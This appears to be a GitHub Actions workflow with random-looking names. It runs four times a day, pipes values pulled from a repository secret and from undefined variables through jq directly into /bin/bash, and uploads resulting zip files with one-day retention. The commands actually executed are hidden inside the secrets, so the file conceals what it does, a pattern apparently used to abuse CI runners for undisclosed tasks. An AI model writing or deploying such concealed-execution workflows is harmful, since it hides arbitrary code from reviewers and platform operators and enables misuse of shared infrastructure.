name: henheliangxiang
on:
  workflow_dispatch:

  schedule:
    - cron: '48 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: henheliangxiang
        env:
          x82: ${{ secrets.x82 }}
        run: |
          printf '%s' "$x82" | jq -r .rzuq719 | /bin/bash
          echo $lx78 | jq -r .f3 | /bin/bash
          printf '%s' "$sfhr64" | jq -r .mbn31 | /bin/bash
          echo $rb5 | jq -r .vlff084 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: NAYhTlFt
          path: "*.zip"
          retention-days: 1
